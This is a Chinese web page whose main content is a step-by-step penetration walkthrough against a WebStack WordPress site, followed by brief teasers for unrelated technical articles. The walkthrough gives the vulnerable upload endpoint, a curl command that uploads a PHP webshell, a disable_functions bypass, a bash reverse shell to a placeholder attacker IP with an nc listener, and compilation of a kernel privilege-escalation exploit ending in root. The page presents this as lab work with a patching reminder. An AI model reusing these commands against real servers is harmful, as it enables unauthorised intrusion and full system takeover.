news 2026/5/28 3:40:59

网站渗透实操!从getshell到CVE提权,Linux最新内核也可提权!

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
网站渗透实操!从getshell到CVE提权,Linux最新内核也可提权!

前段时间Webstack写马漏洞公开

渗透思路如下:

从webstack写马→蚁剑连接→绕过disable_functions→nc反弹→exp提权

实操开始

靶场我用自建WordPress

要看一个webstack站点有没有漏洞可以访问

wp-admin/admin-ajax.php?action=img_upload路径

如果显示0如图,那十有八九就是有这个漏洞

开始写马

在当前目录下创建好木马php文件

然后运行命令上传木马

curl -F "files=@shell.php" https://目标站点/wp-admin/admin-ajax.php?action=img_upload

如图,返回上传成功和木马地址

直接访问木马地址

显示白页,说明木马正常可用

蚁剑连接

测试连接显示成功,然后直接添加

然后打开虚拟终端

发现任何命令都无法执行,原因是禁用了函数,这里需要用到蚁剑插件

绕过 disable_functions

使用蚁剑绕函数插件

靶场php版本为8.1选择对应模式,点击开始

发现命令可成功执行

接下来就直接开始反弹了

Bash反弹

蚁剑虚拟终端(靶机)运行bash -i >& /dev/tcp/攻击机IP/4444 0>&1

攻击机运行

nc -lvnp 4444

用来监听4444端口

此处需攻击机先监听端口,靶机再执行反弹命令

反弹连接成功,

执行cat /etc/os-release命令看看操作系统,发现是乌班图26系统,然后执行lsmod | grep rds命令,发现模块也开启了

刚好可以复现CVE-2026-43494

开始测试

通过蚁剑上传poc

然后运行gcc -O CVE-2026-43494.c -o exp编译poc

运行命令

file exp看看文件编译成功没

看得到exp文件是编译成功

开始提权

直接运行./exp

出现如图不报错,等待一会

直接whoami查看当前用户

显示root用户,输入id回车也是root用户

至此整场渗透结束

结束语

最后,请大家多注重网络安全,及时更新内核,补丁,防患于未然。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/28 3:37:24

别再死磕梯度下降了!用Python手把手教你实现遗传算法解决旅行商问题

用Python实战遗传算法:30行代码解决旅行商问题当物流公司的配送路线优化遇上NP难问题,传统梯度下降方法往往陷入局部最优的泥潭。遗传算法作为一种模拟自然选择的元启发式方法,能在复杂搜索空间中高效寻找近似最优解。本文将带您从零实现一个…

作者头像 李华
网站建设 2026/5/28 3:37:23

告别手动移植:用STM32CubeIDE一站式搞定STM32WL的LoRaWAN节点工程

STM32WL LoRaWAN开发革命:CubeIDE全流程实战指南对于嵌入式开发者而言,LoRaWAN节点开发一直是个令人又爱又恨的领域。传统开发流程中,我们不得不在多个工具间频繁切换——用CubeMX生成基础代码,用Keil/IAR进行编译调试&#xff0c…

作者头像 李华
网站建设 2026/5/28 3:35:10

高光谱图像超分辨率技术:Mamba架构与实时处理实践

1. 高光谱超分辨率的技术挑战与创新机遇高光谱成像技术通过捕获数百个连续窄波段的光谱信息,为地表物质识别和环境监测提供了独特的数据维度。然而受限于传感器物理特性,高光谱图像(HSI)的空间分辨率往往显著低于多光谱或全色图像…

作者头像 李华